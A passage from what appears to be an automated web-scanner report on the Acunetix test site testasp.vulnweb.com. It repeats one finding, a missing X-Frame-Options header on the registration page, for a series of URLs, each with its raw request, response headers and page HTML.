web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=34 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:04 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=35 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:04 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=36 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:04 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=37 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:05 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=38 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:05 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=39 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:05 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 374 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=4 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:00 GMT Content-Length: 3550 |
Response Body - size: 3,550 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=40 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:05 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are 